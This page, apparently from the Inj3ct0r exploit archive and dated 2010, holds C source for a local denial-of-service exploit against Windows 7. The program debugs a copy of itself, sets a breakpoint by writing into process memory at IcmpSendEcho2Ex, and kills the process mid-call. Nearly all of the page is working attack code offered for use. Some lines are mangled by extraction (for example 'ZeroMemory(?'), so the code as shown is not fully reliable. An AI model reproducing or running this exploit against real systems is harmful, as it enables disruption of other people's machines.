Microsoft Windows (IcmpSendEcho2Ex interrupting) Denial of S

Posted on 21 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Microsoft Windows (IcmpSendEcho2Ex interrupting) Denial of Service</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================================
Microsoft Windows (IcmpSendEcho2Ex interrupting) Denial of Service
==================================================================

/*
Microsoft Windows DoS (IcmpSendEcho2Ex interrupting)
Author: l3D
Sites: http://nullbyte.org.il, http://forums.hacking.org.il
IRC: irc://irc.nix.co.il/#security
Email: pupipup33@gmail.com
Tested on Windows 7

Microsoft Windows operating system is prone to a local DoS by interrupting the function IcmpSendEcho2Ex.
The IP address argument should be a non-exist IP address on the net, so the function will wait longer time.
*/
#include &lt;stdio.h&gt;
#include &lt;windows.h&gt;
#include &lt;iphlpapi.h&gt;
#include &lt;winsock2.h&gt;

#pragma comment(lib, &quot;iphlpapi.lib&quot;)
#pragma comment(lib, &quot;ws2_32.lib&quot;)

#define PARAM 0xDEADBEEF

void Terminate(HANDLE hProcess){
     Sleep(150);
     TerminateProcess(hProcess, -1);
}

int main(int argc, char **argv){
    if( argc&lt;2){
        printf(&quot;Usage: %s &lt;ip address&gt;
&quot;, argv[0]);
        return 1;
    }
    
    if( IsDebuggerPresent()){
        HANDLE iphlpapi=LoadLibrary(&quot;iphlpapi.dll&quot;);
        if( !iphlpapi){
            perror(&quot;iphlpapi.dll&quot;);
            return 1;
        }
        FARPROC IcmpSendEcho=GetProcAddress(iphlpapi, &quot;IcmpSendEcho&quot;);
        FARPROC IcmpCreateFile=GetProcAddress(iphlpapi, &quot;IcmpCreateFile&quot;);
        FARPROC IcmpCloseHandle=GetProcAddress(iphlpapi, &quot;IcmpCloseHandle&quot;);
        if( (IcmpSendEcho &amp;&amp; IcmpCreateFile &amp;&amp; IcmpCloseHandle)==0){
            perror(&quot;icmp functions&quot;);
            return 1;
        }
        
        unsigned long ipaddr=INADDR_NONE, params[2];
        HANDLE hIcmpFile;
        char data[32], *reply;
        int replySize=sizeof(ICMP_ECHO_REPLY)+sizeof(data);
        
        if( (ipaddr=inet_addr(argv[1]))==INADDR_NONE){
            perror(&quot;Illegal IP address!&quot;);
            return 1;
        }
        
        if( (hIcmpFile=(HANDLE)IcmpCreateFile())==INVALID_HANDLE_VALUE){
            perror(&quot;IcmpCreateFile&quot;);
            return 1;
        }
        
        reply=(char *)malloc(replySize);
        ZeroMemory(data, sizeof(data));
        params[0]=PARAM;
        params[1]=(unsigned long)GetProcAddress(iphlpapi, &quot;IcmpSendEcho2Ex&quot;);
        
        RaiseException(EXCEPTION_BREAKPOINT, 0, 2, params);
        puts(&quot;Exception raised!&quot;);
        IcmpSendEcho(hIcmpFile, ipaddr, data, sizeof(data), NULL, reply, replySize, 1000);
        puts(&quot;This line should never be shown...&quot;);
        IcmpCloseHandle(hIcmpFile);
        return 0;
    }
    
    PROCESS_INFORMATION pi;
    STARTUPINFO si;
    HANDLE hProcess, hThread;
    DEBUG_EVENT debugEvent;
    EXCEPTION_RECORD *ExceptionRecord=&amp;debugEvent.u.Exception.ExceptionRecord;
    CONTEXT context;
    FARPROC IcmpSendEcho2Ex=NULL;
    char path[256], args[512], originalByte[1];
    
    ZeroMemory(?, sizeof(PROCESS_INFORMATION));
    ZeroMemory(&amp;si, sizeof(STARTUPINFO));
    ZeroMemory(&amp;debugEvent, sizeof(DEBUG_EVENT));
    ZeroMemory(&amp;context, sizeof(CONTEXT));
    ZeroMemory(path, sizeof(path));
    ZeroMemory(args, sizeof(args));
    si.cb=sizeof(STARTUPINFO);
    si.dwFlags=STARTF_USESHOWWINDOW;
    si.wShowWindow=SW_HIDE;
    context.ContextFlags=CONTEXT_FULL | CONTEXT_DEBUG_REGISTERS;
    
    GetModuleFileName(NULL, path, sizeof(path)-1);
    snprintf(args, sizeof(args)-1, &quot;%s %s&quot;, path, argv[1]);
    
    if( !CreateProcess(
        NULL,
        args,
        NULL,
        NULL,
        FALSE,
        DEBUG_PROCESS,
        NULL,
        NULL,
        &amp;si,
        ?
    )){
       perror(&quot;CreateProcess&quot;);
       return 1;
    }
    
    if( (hProcess=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pi.dwProcessId))==NULL){
       perror(&quot;OpenProcess&quot;);
       return 1;
    }
    
    HANDLE kernel32=LoadLibrary(&quot;kernel32.dll&quot;);
    FARPROC DebugSetProcessKillOnExit=GetProcAddress(kernel32, &quot;DebugSetProcessKillOnExit&quot;);
    FARPROC DebugActiveProcessStop=GetProcAddress(kernel32, &quot;DebugActiveProcessStop&quot;);
    FARPROC OpenThread=GetProcAddress(kernel32, &quot;OpenThread&quot;);
    CloseHandle(kernel32);
    DebugSetProcessKillOnExit(TRUE);
    
    while(WaitForDebugEvent(&amp;debugEvent, INFINITE) &amp;&amp; debugEvent.dwDebugEventCode!=EXIT_PROCESS_DEBUG_EVENT){
             if( debugEvent.dwDebugEventCode==EXCEPTION_DEBUG_EVENT &amp;&amp; ExceptionRecord-&gt;ExceptionCode==EXCEPTION_BREAKPOINT){
                 if( ExceptionRecord-&gt;NumberParameters&gt;1 &amp;&amp; ExceptionRecord-&gt;ExceptionInformation[0]==PARAM){
                     IcmpSendEcho2Ex=(FARPROC)ExceptionRecord-&gt;ExceptionInformation[1];
                     printf(&quot;IcmpSendEcho2Ex %p
&quot;, IcmpSendEcho2Ex);
                     if( !BreakpointSet(hProcess, IcmpSendEcho2Ex, &amp;originalByte)){
                         perror(&quot;BreakpointSet&quot;);
                         break;
                     }
                 }
                 else if( ExceptionRecord-&gt;ExceptionAddress==IcmpSendEcho2Ex){
                      printf(&quot;EIP %p
&quot;, IcmpSendEcho2Ex);
                      if( !BreakpointRetrieve(hProcess, IcmpSendEcho2Ex, &amp;originalByte)){
                          perror(&quot;BreakpointRetrieve&quot;);
                          break;
                      }
                      if((hThread=(HANDLE)OpenThread(THREAD_ALL_ACCESS, FALSE, debugEvent.dwThreadId))==NULL) puts(&quot;OpenThread&quot;);
                      if(!GetThreadContext(hThread, &amp;context)) puts(&quot;GetThreadContext&quot;);
                      context.Eip -= 1;
                      if(!SetThreadContext(hThread, &amp;context)) puts(&quot;SetThreadContext&quot;);
                      CreateThread(NULL, 0, (void *)Terminate, hProcess, 0, NULL);
                 }
             }
             else if( debugEvent.dwDebugEventCode==EXCEPTION_DEBUG_EVENT){
                  puts(&quot;Exception!&quot;);
                  DebugActiveProcessStop(debugEvent.dwProcessId);
                  break;
             }
             ContinueDebugEvent(debugEvent.dwProcessId, debugEvent.dwThreadId, DBG_CONTINUE);
             ZeroMemory(&amp;debugEvent, sizeof(DEBUG_EVENT));
    }
    
    return 0;
}

BOOL BreakpointSet(HANDLE hProcess, void *addr, char *originalByte){
     unsigned long oldProtect;
     if(
     VirtualProtectEx(hProcess, addr, 1, PAGE_EXECUTE_READWRITE, &amp;oldProtect) &amp;&amp;
     ReadProcessMemory(hProcess, addr, originalByte, 1, NULL) &amp;&amp;
     WriteProcessMemory(hProcess, addr, &quot;xCC&quot;, 1, NULL) &amp;&amp;
     VirtualProtectEx(hProcess, addr, 1, oldProtect, &amp;oldProtect))
     return TRUE;
     else return FALSE;
}

BOOL BreakpointRetrieve(HANDLE hProcess, void *addr, char *originalByte){
     unsigned long oldProtect;
     if(
     VirtualProtectEx(hProcess, addr, 1, PAGE_EXECUTE_READWRITE, &amp;oldProtect) &amp;&amp;
     WriteProcessMemory(hProcess, addr, originalByte, 1, NULL) &amp;&amp;
     VirtualProtectEx(hProcess, addr, 1, oldProtect, &amp;oldProtect))
     return TRUE;
     else return FALSE;
}



# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-21]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20